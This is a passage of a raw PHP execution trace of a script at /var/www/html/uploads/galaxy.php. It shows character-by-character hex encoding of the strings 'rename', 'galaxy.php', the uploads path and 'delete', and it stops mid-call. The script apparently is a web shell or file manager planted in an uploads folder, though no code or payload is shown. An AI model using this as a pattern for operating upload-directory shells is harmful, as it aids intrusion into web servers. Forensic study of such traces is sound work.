3	1373	0	0.047913	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1373	1	0.047924	485104
3	1373	R			101
3	1374	0	0.047936	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1374	1	0.047947	485136
3	1374	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1375	0	0.047977	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1375	1	0.047988	485104
3	1375	R			110
3	1376	0	0.048000	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1376	1	0.048011	485136
3	1376	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1377	0	0.048041	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1377	1	0.048052	485104
3	1377	R			97
3	1378	0	0.048064	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1378	1	0.048075	485136
3	1378	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1379	0	0.048104	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1379	1	0.048115	485112
3	1379	R			109
3	1380	0	0.048127	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1380	1	0.048143	485144
3	1380	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1381	0	0.048177	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1381	1	0.048192	485112
3	1381	R			101
3	1382	0	0.048204	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1382	1	0.048216	485144
3	1382	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1370	1	0.048246	485072
2	1370	R			'72656e616d65'
2	1383	0	0.048259	485032	hex	1		/var/www/html/uploads/galaxy.php	117	1	'galaxy.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1384	0	0.048291	485032	ord	0		/var/www/html/uploads/galaxy.php	18	1	'g'
3	1384	1	0.048302	485072
3	1384	R			103
3	1385	0	0.048315	485032	dechex	0		/var/www/html/uploads/galaxy.php	18	1	103
3	1385	1	0.048326	485104
3	1385	R			'67'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '67'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1386	0	0.048356	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1386	1	0.048367	485104
3	1386	R			97
3	1387	0	0.048380	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1387	1	0.048391	485136
3	1387	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1388	0	0.048421	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1388	1	0.048432	485104
3	1388	R			108
3	1389	0	0.048444	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1389	1	0.048455	485136
3	1389	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1390	0	0.048485	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1390	1	0.048496	485104
3	1390	R			97
3	1391	0	0.048508	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1391	1	0.048520	485136
3	1391	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1392	0	0.048550	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'x'
3	1392	1	0.048560	485112
3	1392	R			120
3	1393	0	0.048573	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	120
3	1393	1	0.048584	485144
3	1393	R			'78'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '78'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1394	0	0.048614	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'y'
3	1394	1	0.048626	485112
3	1394	R			121
3	1395	0	0.048638	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	121
3	1395	1	0.048650	485144
3	1395	R			'79'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '79'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1396	0	0.048679	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1396	1	0.048691	485112
3	1396	R			46
3	1397	0	0.048703	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1397	1	0.048715	485144
3	1397	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1398	0	0.048744	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1398	1	0.048756	485112
3	1398	R			112
3	1399	0	0.048768	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1399	1	0.048779	485144
3	1399	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1400	0	0.048808	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1400	1	0.048820	485120
3	1400	R			104
3	1401	0	0.048832	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1401	1	0.048843	485152
3	1401	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1402	0	0.048875	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1402	1	0.048939	485120
3	1402	R			112
3	1403	0	0.048954	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1403	1	0.048971	485152
3	1403	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1383	1	0.049002	485080
2	1383	R			'67616c6178792e706870'
2	1404	0	0.049017	485160	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1405	0	0.049048	485160	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1405	1	0.049060	485200
3	1405	R			47
3	1406	0	0.049072	485160	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1406	1	0.049084	485232
3	1406	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1407	0	0.049114	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1407	1	0.049125	485232
3	1407	R			118
3	1408	0	0.049138	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1408	1	0.049149	485264
3	1408	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1409	0	0.049179	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1409	1	0.049190	485232
3	1409	R			97
3	1410	0	0.049202	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1410	1	0.049214	485264
3	1410	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1411	0	0.049243	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1411	1	0.049254	485232
3	1411	R			114
3	1412	0	0.049267	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1412	1	0.049278	485264
3	1412	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1413	0	0.049307	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1413	1	0.049319	485240
3	1413	R			47
3	1414	0	0.049331	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1414	1	0.049343	485272
3	1414	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1415	0	0.049372	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1415	1	0.049384	485240
3	1415	R			119
3	1416	0	0.049396	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1416	1	0.049407	485272
3	1416	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1417	0	0.049436	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1417	1	0.049448	485240
3	1417	R			119
3	1418	0	0.049460	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1418	1	0.049472	485272
3	1418	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1419	0	0.049500	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1419	1	0.049511	485240
3	1419	R			119
3	1420	0	0.049523	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1420	1	0.049535	485272
3	1420	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1421	0	0.049564	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1421	1	0.049575	485248
3	1421	R			47
3	1422	0	0.049587	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1422	1	0.049599	485280
3	1422	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1423	0	0.049628	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1423	1	0.049640	485248
3	1423	R			104
3	1424	0	0.049652	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1424	1	0.049663	485280
3	1424	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1425	0	0.049695	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1425	1	0.049707	485248
3	1425	R			116
3	1426	0	0.049719	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1426	1	0.049730	485280
3	1426	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1427	0	0.049760	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1427	1	0.049772	485248
3	1427	R			109
3	1428	0	0.049784	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1428	1	0.049795	485280
3	1428	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1429	0	0.049825	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1429	1	0.049836	485256
3	1429	R			108
3	1430	0	0.049849	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1430	1	0.049860	485288
3	1430	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1431	0	0.049889	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1431	1	0.049901	485256
3	1431	R			47
3	1432	0	0.049913	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1432	1	0.049924	485288
3	1432	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1433	0	0.049954	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1433	1	0.049965	485256
3	1433	R			117
3	1434	0	0.049977	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1434	1	0.049989	485288
3	1434	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1435	0	0.050018	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1435	1	0.050030	485256
3	1435	R			112
3	1436	0	0.050042	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1436	1	0.050053	485288
3	1436	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1437	0	0.050083	485224	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1437	1	0.050094	485264
3	1437	R			108
3	1438	0	0.050106	485224	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1438	1	0.050117	485296
3	1438	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1439	0	0.050147	485224	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1439	1	0.050158	485264
3	1439	R			111
3	1440	0	0.050170	485224	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1440	1	0.050181	485296
3	1440	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1441	0	0.050211	485224	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1441	1	0.050222	485264
3	1441	R			97
3	1442	0	0.050234	485224	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1442	1	0.050245	485296
3	1442	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1443	0	0.050275	485224	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1443	1	0.050286	485264
3	1443	R			100
3	1444	0	0.050298	485224	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1444	1	0.050309	485296
3	1444	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1445	0	0.050338	485240	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1445	1	0.050349	485280
3	1445	R			115
3	1446	0	0.050361	485240	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1446	1	0.050372	485312
3	1446	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1404	1	0.050405	485240
2	1404	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1447	0	0.050420	485288	hex	1		/var/www/html/uploads/galaxy.php	117	1	'galaxy.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1448	0	0.050451	485288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'g'
3	1448	1	0.050463	485328
3	1448	R			103
3	1449	0	0.050475	485288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	103
3	1449	1	0.050487	485360
3	1449	R			'67'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '67'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1450	0	0.050516	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1450	1	0.050528	485360
3	1450	R			97
3	1451	0	0.050540	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1451	1	0.050552	485392
3	1451	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1452	0	0.050582	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1452	1	0.050593	485360
3	1452	R			108
3	1453	0	0.050605	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1453	1	0.050616	485392
3	1453	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1454	0	0.050646	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1454	1	0.050657	485360
3	1454	R			97
3	1455	0	0.050669	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1455	1	0.050681	485392
3	1455	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1456	0	0.050710	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'x'
3	1456	1	0.050721	485368
3	1456	R			120
3	1457	0	0.050733	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	120
3	1457	1	0.050744	485400
3	1457	R			'78'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '78'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1458	0	0.050773	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'y'
3	1458	1	0.050784	485368
3	1458	R			121
3	1459	0	0.050803	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	121
3	1459	1	0.050816	485400
3	1459	R			'79'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '79'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1460	0	0.050846	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1460	1	0.050858	485368
3	1460	R			46
3	1461	0	0.050870	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1461	1	0.050881	485400
3	1461	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1462	0	0.050911	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1462	1	0.050922	485368
3	1462	R			112
3	1463	0	0.050934	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1463	1	0.050946	485400
3	1463	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1464	0	0.050975	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1464	1	0.050986	485376
3	1464	R			104
3	1465	0	0.050998	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1465	1	0.051010	485408
3	1465	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1466	0	0.051039	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1466	1	0.051050	485376
3	1466	R			112
3	1467	0	0.051062	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1467	1	0.051074	485408
3	1467	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1447	1	0.051106	485336
2	1447	R			'67616c6178792e706870'
2	1468	0	0.051120	485416	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1469	0	0.051151	485416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1469	1	0.051163	485456
3	1469	R			47
3	1470	0	0.051175	485416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1470	1	0.051187	485488
3	1470	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1471	0	0.051216	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1471	1	0.051228	485488
3	1471	R			118
3	1472	0	0.051240	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1472	1	0.051251	485520
3	1472	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1473	0	0.051281	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1473	1	0.051292	485488
3	1473	R			97
3	1474	0	0.051304	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1474	1	0.051315	485520
3	1474	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1475	0	0.051345	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1475	1	0.051356	485488
3	1475	R			114
3	1476	0	0.051368	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1476	1	0.051379	485520
3	1476	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1477	0	0.051408	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1477	1	0.051419	485496
3	1477	R			47
3	1478	0	0.051431	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1478	1	0.051443	485528
3	1478	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1479	0	0.051472	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1479	1	0.051483	485496
3	1479	R			119
3	1480	0	0.051495	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1480	1	0.051507	485528
3	1480	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1481	0	0.051536	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1481	1	0.051547	485496
3	1481	R			119
3	1482	0	0.051559	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1482	1	0.051570	485528
3	1482	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1483	0	0.051599	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1483	1	0.051611	485496
3	1483	R			119
3	1484	0	0.051623	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1484	1	0.051634	485528
3	1484	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1485	0	0.051662	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1485	1	0.051674	485504
3	1485	R			47
3	1486	0	0.051686	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1486	1	0.051697	485536
3	1486	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1487	0	0.051726	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1487	1	0.051738	485504
3	1487	R			104
3	1488	0	0.051750	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1488	1	0.051761	485536
3	1488	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1489	0	0.051790	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1489	1	0.051805	485504
3	1489	R			116
3	1490	0	0.051817	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1490	1	0.051828	485536
3	1490	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1491	0	0.051858	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1491	1	0.051870	485504
3	1491	R			109
3	1492	0	0.051882	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1492	1	0.051893	485536
3	1492	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1493	0	0.051923	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1493	1	0.051934	485512
3	1493	R			108
3	1494	0	0.051947	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1494	1	0.051958	485544
3	1494	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1495	0	0.051988	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1495	1	0.051999	485512
3	1495	R			47
3	1496	0	0.052011	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1496	1	0.052022	485544
3	1496	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1497	0	0.052052	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1497	1	0.052064	485512
3	1497	R			117
3	1498	0	0.052076	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1498	1	0.052088	485544
3	1498	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1499	0	0.052117	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1499	1	0.052128	485512
3	1499	R			112
3	1500	0	0.052140	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1500	1	0.052151	485544
3	1500	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1501	0	0.052181	485480	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1501	1	0.052192	485520
3	1501	R			108
3	1502	0	0.052204	485480	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1502	1	0.052215	485552
3	1502	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1503	0	0.052245	485480	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1503	1	0.052256	485520
3	1503	R			111
3	1504	0	0.052268	485480	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1504	1	0.052279	485552
3	1504	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1505	0	0.052308	485480	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1505	1	0.052319	485520
3	1505	R			97
3	1506	0	0.052331	485480	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1506	1	0.052343	485552
3	1506	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1507	0	0.052372	485480	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1507	1	0.052384	485520
3	1507	R			100
3	1508	0	0.052396	485480	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1508	1	0.052407	485552
3	1508	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1509	0	0.052437	485496	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1509	1	0.052448	485536
3	1509	R			115
3	1510	0	0.052460	485496	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1510	1	0.052472	485568
3	1510	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1468	1	0.052501	485496
2	1468	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1511	0	0.052519	485416	hex	1		/var/www/html/uploads/galaxy.php	117	1	'delete'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1512	0	0.052550	485416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1512	1	0.052561	485456
3	1512	R			100
3	1513	0	0.052574	485416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1513	1	0.052585	485488
3	1513	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1514	0	0.052615	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1514	1	0.052626	485488
3	1514	R			101
3	1515	0	0.052638	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1515	1	0.052649	485520
3	1515	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1516	0	0.052679	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1516	1	0.052690	485488
3	1516	R			108
3	1517	0	0.052702	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1517	1	0.052713	485520
3	1517	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1518	0	0.052742	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1518	1	0.052754	485488
3	1518	R			101
3	1519	0	0.052766	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1519	1	0.052777	485520
